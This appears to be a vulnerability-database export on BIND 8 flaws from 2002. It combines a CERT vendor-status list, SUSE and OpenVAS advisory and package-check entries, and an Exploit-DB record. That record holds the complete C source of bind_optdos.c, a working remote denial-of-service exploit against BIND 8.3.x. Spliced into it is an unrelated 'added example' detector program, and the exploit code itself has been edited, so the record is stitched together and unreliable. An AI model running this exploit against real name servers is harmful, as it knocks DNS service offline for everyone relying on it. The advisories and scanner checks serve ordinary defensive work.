Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 15, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### SuSE Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### The Open Group Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Trend Micro Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Trustix __ Unknown\n\nUpdated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n<<http://www.trustix.net/errata/misc/2002/TSL-2002-0076-bind.asc.txt>>\n\nIf you have 
feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Unisys Unknown\n\nNotified: November 12, 2002 Updated: April 04, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Wirex Unknown\n\nNotified: November 12, 2002 Updated: November 13, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### Xi Graphics Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information 
\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### YARD RADIUS Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### djbdns Unknown\n\nNotified: November 12, 2002 Updated: February 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n### fetchmail Unknown\n\nNotified: November 14, 2002 Updated: November 14, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23844360 Feedback>).\n\n
### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n\n### References \n\n * <http://www.isc.org/products/BIND/bind-security.html>\n * <http://www.isc.org/products/BIND/patches/bind4910.diff>\n\n### Acknowledgements\n\nThis vulnerability was reported by CERT/CC staff.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0029](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-0029>) \n---|--- \n**CERT Advisory:** | [CA-2002-31 ](<http://www.cert.org/advisories/CA-2002-31.html>) \n**Severity Metric:** | 8.91 \n**Date Public:** | 2002-11-12 \n**Date First Published:** | 2002-11-13 \n**Date Last Updated: ** | 2003-04-24 04:14 UTC \n**Document Revision: ** | 22 \n", "modified": "2003-04-24T04:14:00", "published": "2002-11-13T00:00:00", "id": "VU:844360", "href": "https://www.kb.cert.org/vuls/id/844360", "type": "cert", "title": "Domain Name System (DNS) stub resolver libraries vulnerable to buffer overflows via network name or address lookups", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T17:46:39", "description": "ISC BIND 8.3.x OPT Record Large UDP Denial of Service Vulnerability. CVE-2002-1220. DoS exploit for linux platform", "published": "2002-11-12T00:00:00", "type": "exploitdb", "title": "ISC BIND 8.3.x OPT Record Large UDP Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1220"], "modified": "2002-11-12T00:00:00", "id": "EDB-ID:22011", "href": "https://www.exploit-db.com/exploits/22011/", "sourceData": "source: http://www.securityfocus.com/bid/6161/info\r\n\r\nISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a nonexistent sub-domain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail. 
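The datagram that the bind_optdos.c proof of concept below sends is an ordinary recursive A query with one additional record: the EDNS0 OPT pseudo-RR, whose CLASS field carries the sender's UDP payload size (the PoC's UDP_SIZE, 65535). The C below is an added example and not code from this page, from ISC or from the PoC's author. It builds that wire message, parses the OPT RR back out of an arbitrary DNS message, and flags an advertised size above a limit, which is the check a resolver operator or an IDS rule author would want for traffic aimed at this bug. The function names, the sample names, and the 4096-octet limit (the starting point RFC 6891 suggests; many resolvers now use 1232) are this example's own choices, and it does not reproduce the BIND 8 assertion failure, which needs a vulnerable named and a name that resolves to NXDOMAIN.

```c
/* edns_opt.c: build a DNS query carrying an EDNS0 OPT pseudo-RR and parse
 * the OPT RR (and its advertised UDP payload size) out of a DNS message.
 * Added example; not part of the original advisory or the PoC. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DNS_TYPE_A    1
#define DNS_CLASS_IN  1
#define DNS_TYPE_OPT  41   /* EDNS0 OPT pseudo-RR, RFC 2671 / RFC 6891 */
#define DNS_HDR_LEN   12

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)(v & 0xff); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Encode "a.b.c" as length-prefixed labels plus the root label.
 * Returns bytes written, 0 on an empty label (e.g. "a..b"), a label over 63
 * octets, or a full buffer. Same encoding the PoC's '.'-overwrite loop does. */
static size_t encode_name(const char *name, uint8_t *out, size_t outlen)
{
    size_t pos = 0;
    const char *s = name;
    while (*s) {
        const char *dot = strchr(s, '.');
        size_t lab = dot ? (size_t)(dot - s) : strlen(s);
        if (lab == 0 || lab > 63 || pos + 1 + lab + 1 > outlen) return 0;
        out[pos++] = (uint8_t)lab;
        memcpy(out + pos, s, lab);
        pos += lab;
        s += lab;
        if (*s == '.') s++;
    }
    if (pos + 1 > outlen) return 0;
    out[pos++] = 0;                       /* root label terminates the name */
    return pos;
}

/* Header (RD set) + one A/IN question + one OPT RR in the additional section
 * advertising udp_size. Returns the message length, 0 on error. */
size_t build_edns_query(uint16_t id, const char *qname, uint16_t udp_size,
                        uint8_t *buf, size_t buflen)
{
    size_t n, pos;
    if (buflen < DNS_HDR_LEN) return 0;
    memset(buf, 0, DNS_HDR_LEN);
    put16(buf + 0, id);
    put16(buf + 2, 0x0100);               /* QR=0, opcode QUERY, RD=1 */
    put16(buf + 4, 1);                    /* QDCOUNT */
    put16(buf + 10, 1);                   /* ARCOUNT: the OPT pseudo-RR */
    n = encode_name(qname, buf + DNS_HDR_LEN, buflen - DNS_HDR_LEN);
    if (n == 0) return 0;
    pos = DNS_HDR_LEN + n;
    if (pos + 4 + 11 > buflen) return 0;
    put16(buf + pos, DNS_TYPE_A);   pos += 2;
    put16(buf + pos, DNS_CLASS_IN); pos += 2;
    /* OPT RR: NAME=root, TYPE=41, CLASS=UDP payload size,
     * TTL=extended RCODE/version/flags (all zero), RDLENGTH=0 */
    buf[pos++] = 0;
    put16(buf + pos, DNS_TYPE_OPT); pos += 2;
    put16(buf + pos, udp_size);     pos += 2;
    memset(buf + pos, 0, 4);        pos += 4;
    put16(buf + pos, 0);            pos += 2;
    return pos;
}

/* Skip a wire-format name starting at off; handles compression pointers.
 * Returns the offset after the name, 0 if malformed or truncated. */
static size_t skip_name(const uint8_t *msg, size_t len, size_t off)
{
    while (off < len) {
        uint8_t l = msg[off];
        if (l == 0) return off + 1;
        if ((l & 0xC0) == 0xC0) return off + 2 <= len ? off + 2 : 0;
        if ((l & 0xC0) != 0) return 0;    /* reserved label types */
        off += 1 + l;
    }
    return 0;
}

/* Skip one RR, reporting its TYPE and CLASS. Returns 0 if malformed. */
static size_t skip_rr(const uint8_t *msg, size_t len, size_t off,
                      uint16_t *type, uint16_t *cls)
{
    uint16_t rdlen;
    off = skip_name(msg, len, off);
    if (off == 0 || off + 10 > len) return 0;
    *type = get16(msg + off);
    *cls  = get16(msg + off + 2);
    rdlen = get16(msg + off + 8);
    off += 10;
    return off + rdlen <= len ? off + rdlen : 0;
}

/* UDP payload size advertised by the OPT RR in msg's additional section,
 * 0 if there is none or the message is malformed. */
uint16_t edns_udp_size(const uint8_t *msg, size_t len)
{
    uint16_t qd, an, ns, ar, type, cls;
    unsigned i;
    size_t off = DNS_HDR_LEN;
    if (len < DNS_HDR_LEN) return 0;
    qd = get16(msg + 4); an = get16(msg + 6); ns = get16(msg + 8); ar = get16(msg + 10);
    for (; qd; qd--) {                    /* question: name + QTYPE + QCLASS */
        off = skip_name(msg, len, off);
        if (off == 0 || off + 4 > len) return 0;
        off += 4;
    }
    for (i = 0; i < (unsigned)an + ns; i++)
        if ((off = skip_rr(msg, len, off, &type, &cls)) == 0) return 0;
    for (; ar; ar--) {
        if ((off = skip_rr(msg, len, off, &type, &cls)) == 0) return 0;
        if (type == DNS_TYPE_OPT) return cls;   /* CLASS holds the size */
    }
    return 0;
}

/* 1 if msg carries an OPT RR advertising more than limit octets. */
int edns_oversized(const uint8_t *msg, size_t len, uint16_t limit)
{
    return edns_udp_size(msg, len) > limit;
}

int main(void)
{
    uint8_t msg[512];
    size_t n = build_edns_query(0x1234, "nonexistent.example.com", 65535, msg, sizeof msg);
    printf("query bytes: %zu, advertised EDNS UDP size: %u, over 4096: %s\n",
           n, (unsigned)edns_udp_size(msg, n), edns_oversized(msg, n, 4096) ? "yes" : "no");
    return 0;
}
```

The same parser run over the UDP payload of captured port-53 traffic gives a cheap detector: a query whose OPT RR advertises 65535 octets against a BIND 8.3.x resolver that still has recursion enabled is exactly what the PoC produces, and nothing legitimate needs a buffer that large.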
\r\n\r\n/*\r\n *\r\n * bind_optdos.c\r\n *\r\n * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL\r\n * Based on the bug disclosed by ISS\r\n *\r\n * (c) Spybreak (spybreak@host.sk) November/2002\r\n *\r\n * Proof of concept exploit code\r\n * For educational and testing purposes only!\r\n *\r\n *\r\n * Usage: ./bind_optdos domain target [udp_size]\r\n *\r\n * domain - should be a nonexistent subdomain\r\n * of an existing one, different from the target's,\r\n * or a domain whose authoritative name servers are\r\n * unreachable\r\n *\r\n *\r\n * Greetz to: sd, g00bER and hysteria.sk ;-)\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <strings.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n\r\n#define UDP_SIZE 65535\r\n#define OPT 41\r\n#define PORT 53\r\n#define MAXRESP 1024\r\n#define TIMEOUT 10\r\n\r\n/* DNS header flag bits; this bit-field order matches the wire layout only\r\n * with GCC's little-endian bit-field allocation, as in the original code */\r\ntypedef struct {\r\n unsigned short rcode : 4;\r\n unsigned short zero : 3;\r\n unsigned short ra : 1;\r\n unsigned short rd : 1;\r\n unsigned short tc : 1;\r\n unsigned short aa : 1;\r\n unsigned short opcode : 4;\r\n unsigned short qr : 1;\r\n} MSG_FLAGS;\r\n\r\ntypedef struct {\r\n unsigned short id;\r\n unsigned short flags;\r\n unsigned short nqst;\r\n unsigned short nansw;\r\n unsigned short nauth;\r\n unsigned short nadd;\r\n} DNS_MSG_HDR;\r\n\r\n/* Append a 16-bit value in network byte order and advance the cursor.\r\n * Replaces the original *(((unsigned short *) bu)++) = htons(v) idiom,\r\n * a cast-as-lvalue extension that current compilers reject. */\r\nstatic void put16(char **p, unsigned short v)\r\n{\r\n unsigned short n = htons(v);\r\n memcpy(*p, &n, sizeof(n));\r\n *p += sizeof(n);\r\n}\r\n\r\nvoid usage(char *argv0)\r\n{\r\n printf(\"********************************************\\n\"\r\n \"* OPT DoS Exploit for BIND 8.3.[0-3] *\\n\"\r\n \"* (c) Spybreak November/2002 *\\n\"\r\n \"********************************************\\n\");\r\n printf(\"\\n%s domain target [udp_size]\\n\\n\", argv0);\r\n exit(0);\r\n}\r\n\r\nvoid sig_alrm(int signo)\r\n{\r\n (void) signo;\r\n printf(\"No response yet, the target BIND seems to be down\\n\");\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n struct sockaddr_in targ_addr;\r\n struct hostent *he;\r\n MSG_FLAGS fl;\r\n DNS_MSG_HDR hdr;\r\n char qname[512], buff[1024];\r\n char *bu, *dom, *dot;\r\n int msg_size, dom_len, sockfd, n;\r\n unsigned short udp_size = UDP_SIZE;\r\n char response[MAXRESP + 1];\r\n\r\n if (argc < 3)\r\n usage(argv[0]);\r\n if (argc == 4)\r\n udp_size = (unsigned short) atoi(argv[3]);\r\n\r\n if (!(he = gethostbyname(argv[2]))) {\r\n printf(\"Invalid target '%s'\\n\", argv[2]);\r\n exit(-1);\r\n }\r\n\r\n printf(\"Query on domain: %s\\nTarget: %s\\n\", argv[1], argv[2]);\r\n printf(\"EDNS UDP size: %u\\n\", udp_size);\r\n\r\n /* strip a trailing dot so the label loop below does not emit an empty label */\r\n if (strlen(argv[1]) > 0 && argv[1][strlen(argv[1]) - 1] == '.')\r\n argv[1][strlen(argv[1]) - 1] = '\\0';\r\n\r\n /* QNAME in wire format: copy the name after a leading length byte, then\r\n * overwrite each '.' with the length of the label that follows it */\r\n memset(qname, 0, sizeof(qname));\r\n strncpy(qname + 1, argv[1], sizeof(qname) - 2);\r\n dom = qname;\r\n\r\n while ((dot = strchr(dom + 1, '.')) != NULL) {\r\n *dom = (char) (dot - dom - 1);\r\n dom = dot;\r\n }\r\n *dom = (char) strlen(dom + 1);\r\n dom_len = dom - qname + strlen(dom + 1) + 2; /* labels plus the root label */\r\n\r\n bu = buff;\r\n\r\n fl.qr = 0;\r\n fl.opcode = 0;\r\n fl.aa = 0;\r\n fl.tc = 0;\r\n fl.rd = 1; /* recursion desired: the target must try to resolve the name */\r\n fl.ra = 0;\r\n fl.zero = 0;\r\n fl.rcode = 0;\r\n\r\n srand(time(0));\r\n hdr.id = htons((unsigned short) (65535.0*rand()/(RAND_MAX+1.0)) + 1);\r\n hdr.flags = htons(*((unsigned short *) &fl));\r\n hdr.nqst = htons(1);\r\n hdr.nansw = 0;\r\n hdr.nauth = 0;\r\n hdr.nadd = htons(1); /* one additional record: the OPT pseudo-RR */\r\n\r\n bcopy(&hdr, bu, sizeof(hdr));\r\n bu += sizeof(hdr);\r\n bcopy(qname, bu, dom_len);\r\n bu += dom_len;\r\n put16(&bu, 1); //query type A\r\n put16(&bu, 1); //query class IN\r\n\r\n //opt rr (RFC 2671): root name, type 41, CLASS = sender's UDP payload size\r\n *bu++ = '\\0';\r\n put16(&bu, OPT); //type\r\n put16(&bu, udp_size); //udp payload size\r\n memset(bu, 0, 4); //extended rcode, version and flags\r\n bu += 4;\r\n put16(&bu, 0); //rdlen\r\n\r\n msg_size = bu - buff;\r\n\r\n bzero(&targ_addr, sizeof(targ_addr));\r\n targ_addr.sin_family = AF_INET;\r\n targ_addr.sin_port = htons(PORT);\r\n memcpy(&targ_addr.sin_addr, he->h_addr_list[0], sizeof(targ_addr.sin_addr));\r\n\r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd < 0) {\r\n perror(\"socket\");\r\n exit(-1);\r\n }\r\n n = sendto(sockfd, buff, msg_size, 0, (struct sockaddr *) &targ_addr, (socklen_t) sizeof(targ_addr));\r\n if (n < 0) {\r\n perror(\"sendto\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"Datagram sent\\nWaiting for response ...\\n\");\r\n\r\n /* a vulnerable named dies while building the NXDOMAIN reply, so nothing\r\n * comes back and the alarm fires; any reply means the target survived */\r\n signal(SIGALRM, sig_alrm);\r\n alarm(TIMEOUT);\r\n n = recvfrom(sockfd, response, MAXRESP, 0, NULL, NULL);\r\n alarm(0);\r\n if (n < 0) {\r\n perror(\"recvfrom\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"Response received, the target BIND seems to be still up\\n\");\r\n printf(\"Maybe the target is not an OPT DoS vulnerable BIND version, recursion disabled, or try to change domain/udp_size, ...\\n\");\r\n exit(0);\r\n}\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22011/"}], "suse": [{"lastseen": "2016-09-04T12:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "The security research company ISS (Internet Security Services) has discovered several vulnerabilities in the BIND8 name server, including a remotely exploitable buffer overflow.", "edition": 1, "modified": "2002-11-14T10:23:37", "published": "2002-11-14T10:23:37", "id": "SUSE-SA:2002:044", "href": "http://lists.opensuse.org/opensuse-security-announce/2002-11/msg00009.html", "type": "suse", "title": "remote command execution in bind8", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "The remote host is missing an update to bind\nannounced via advisory DSA 196-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53584", "href": "http://plugins.openvas.org/nasl.php?oid=53584", "type": "openvas", "title": "Debian 
Security Advisory DSA 196-1 (bind)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_196_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 196-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"[Bind version 9, the bind9 package, is not affected by these problems.]\n\nISS X-Force has discovered several serious vulnerabilities in the Berkeley\nInternet Name Domain Server (BIND). BIND is the most common implementation\nof the DNS (Domain Name Service) protocol, which is used on the vast\nmajority of DNS servers on the Internet. DNS is a vital Internet protocol\nthat maintains a database of easy-to-remember domain names (host names) and\ntheir corresponding numerical IP addresses.\n\nCircumstantial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in mid-October.\nDistributors of Open Source operating systems, including Debian, were\nnotified of these vulnerabilities via CERT about 12 hours before the release\nof the advisories on November 12th. 
This notification did not include any\ndetails that allowed us to identify the vulnerable code, much less prepare\ntimely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with only\ndescriptions of the vulnerabilities, without any patches. Even though there\nwere no signs that these exploits are known to the black-hat community, and\nthere were no reports of active attacks, such attacks could have been\ndeveloped in the meantime - with no fixes available.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in handling\nthis problem. Hopefully this will not become a model for dealing with\nsecurity issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities:\n\n1. CVE-2002-1219: A buffer overflow in BIND 8 versions 8.3.3 and earlier\nallows a remote attacker to execute arbitrary code via a certain DNS\nserver response containing SIG resource records (RR). This buffer\noverflow can be exploited to obtain access to the victim host under the\naccount the named process is running with, usually root.\n\n2. CVE-2002-1220: BIND 8 versions 8.3.x through 8.3.3 allows a remote\nattacker to cause a denial of service (termination due to assertion\nfailure) via a request for a subdomain that does not exist, with an OPT\nresource record with a large UDP payload size.\n\n3. CVE-2002-1221: BIND 8 versions 8.x through 8.3.3 allows a remote attacker\nto cause a denial of service (crash) via SIG RR elements with invalid\nexpiry times, which are removed from the internal BIND database and later\ncause a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the current\nstable distribution (woody), in 8.2.3-0.potato.3 for the previous stable\ndistribution (potato) and in version 8.3.3-3 for the unstable distribution\n(sid). 
The fixed packages for unstable will enter the archive today.\n\nWe recommend that you upgrade your bind package immediately, update to\";\ntag_summary = \"The remote host is missing an update to bind\nannounced via advisory DSA 196-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20196-1\";\n\nif(description)\n{\n script_id(53584);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 196-1 (bind)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"task-dns-server\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-doc\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-dev\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind\", 
ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"8.2.3-0.potato.3\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-doc\", ver:\"8.3.3-2.0woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind-dev\", ver:\"8.3.3-2.0woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind\", ver:\"8.3.3-2.0woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"8.2.3-0.potato.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "Check for the Version of BIND", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835099", "href": "http://plugins.openvas.org/nasl.php?oid=835099", "type": "openvas", "title": "HP-UX Update for BIND HPSBUX00233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX00233\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Execution of arbitrary code\n denial of service (DoS).\";\ntag_affected = \"BIND on\n HP-UX releases B.10.10, B.10.20, B.11.00, B.11.04 (VVOS), and B.11.11 \n running BIND 4.9.7 or BIND-8.1.2.\";\ntag_insight = \"A vulnerability in BIND DNS resolver libraries may allow remote attackers to \n execute arbitrary code with the privileges of the user running named, \n typically root or to create a denial of service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00957868-1\");\n script_id(835099);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 